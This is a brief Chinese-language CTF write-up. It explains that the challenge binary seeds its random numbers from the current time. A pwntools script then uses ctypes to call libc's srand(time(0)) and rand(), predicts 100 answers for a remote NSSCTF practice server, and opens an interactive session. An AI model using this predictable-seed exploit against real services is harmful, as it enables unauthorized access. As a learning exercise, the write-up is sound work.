查一下程序保护状态
保护全开,看一下代码逻辑
逻辑比较简单,就是输入一个用户名,然后进行随机数运算,这里可以使用ctypes模块,形成和服务器那边一模一样的随机数
from pwn import *
import ctypes
context(os='linux',arch='amd64',log_level='debug')
io=remote("node5.anna.nssctf.cn",28750)
libc=ctypes.CDLL("libc.so.6")
io.recvuntil(b"there?\n")
io.sendline(b"gg")
seed=libc.time(0)
libc.srand(seed)
for i in range(100):
tmp=libc.rand()%100000+1
io.sendlineafter(b"What is it?",str(tmp))
io.interactive()